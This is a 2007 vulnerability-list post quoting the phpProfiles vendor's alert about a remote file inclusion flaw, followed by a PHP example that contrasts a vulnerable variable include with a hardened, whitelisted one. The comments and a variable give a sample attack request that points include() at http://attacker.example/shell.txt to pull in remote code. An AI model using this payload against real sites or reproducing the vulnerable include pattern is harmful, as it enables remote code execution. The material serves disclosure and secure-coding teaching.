[VIM] phpProfiles vendor ack
security curmudgeon
jericho at attrition.org
Thu Mar 1 23:39:12 EST 2007
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-6740
http://linuxwebshop.com/forum/viewtopic.php?t=40
Posted: Fri Dec 22, 2006 2:11 pm Post subject: Security Alert
Hackers have found a way to exploit the script the way it is written. We use
variables that are defined in config.php for some of the include paths. Since
the script is open source, a hacker is able to download the script and learn
the names given to these variables (i.e. $incpath, $usrinc, etc.).
The hacker then uses the variables to call code from their server. The solution
will be to change all of the include variables to absolute paths:
include("$usrinc/body.inc.php");
to
include("include/body.inc.php"); etc ...
The fix will involve some time to complete. Until then, while we took down the
demo we did leave the download up in case someone wants to use the script &
make the modifications themselves. More about the issue is available at:
http://www.securityfocus.com/bid/21667/discuss
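The include pattern the vendor describes, as an added illustration that is not phpProfiles' code nor the vendor's actual fix: the vulnerable form beside a hardened one. Assumed, and not stated in the post: PHP's register_globals is on, so a query-string parameter named usrinc becomes $usrinc before the include runs, and allow_url_fopen lets include() fetch http:// URLs. The names $usrinc, config.php and body.inc.php come from the post; the whitelist, the resolve_include() helper, the attacker hostname and the temporary include directory are constructed for the demo.

```php
<?php
// Added illustration, not phpProfiles' own code.
// Assumed (not on the page): register_globals is on, so a request such as
//   GET /page.php?usrinc=http://attacker.example/shell.txt%3F
// creates $usrinc before the include below runs; the trailing "?" turns
// "/body.inc.php" into a query string on the attacker's server, so the
// attacker's file is what include() fetches. allow_url_fopen is assumed on.

// ---- vulnerable form (the pattern the post quotes) --------------------------
function vulnerable_body()
{
    global $usrinc;                   // may come straight from the request
    include("$usrinc/body.inc.php");  // remote path -> attacker code executes
}

// ---- hardened form ----------------------------------------------------------
// Resolve a short include name to a file under $base, or return false.
//  - $base is derived from the script's own location, never from a variable
//  - $name must match a small whitelist of known include names
//  - the resolved path must still sit under $base after realpath()
function resolve_include($base, $name)
{
    static $allowed = array('body', 'header', 'footer');
    if (!in_array($name, $allowed, true)) {
        return false;                 // rejects '../x', 'http://...', etc.
    }
    $real   = realpath($base . '/' . $name . '.inc.php');
    $prefix = realpath($base) . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;                 // missing file, or escaped the directory
    }
    return $real;
}

function safe_body($base)
{
    $path = resolve_include($base, 'body');
    if ($path === false) {
        die("refusing include\n");
    }
    include $path;
}

// ---- demo against a constructed include directory ---------------------------
$base = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($base . '/include', 0700, true);
file_put_contents($base . '/include/body.inc.php', "<?php echo \"body included\\n\";");

$usrinc = $base . '/include';         // what config.php is meant to set
vulnerable_body();                     // legitimate include works

$usrinc = 'http://attacker.example/shell.txt?';   // what the attacker supplies
// vulnerable_body();  <- with allow_url_fopen on, this would fetch and run it

safe_body($base . '/include');         // same include, path fixed by the app
var_dump(resolve_include($base . '/include', '../../etc/passwd'));
var_dump(resolve_include($base . '/include', 'http://attacker.example/x'));

unlink($base . '/include/body.inc.php');
rmdir($base . '/include');
rmdir($base);
```

The vendor's proposed change to a literal path such as include("include/body.inc.php") removes the request-controlled variable, which is the essential fix; anchoring the base to dirname(__FILE__) additionally keeps the include from depending on the working directory or include_path, and the whitelist covers the case where the file name itself is ever taken from input.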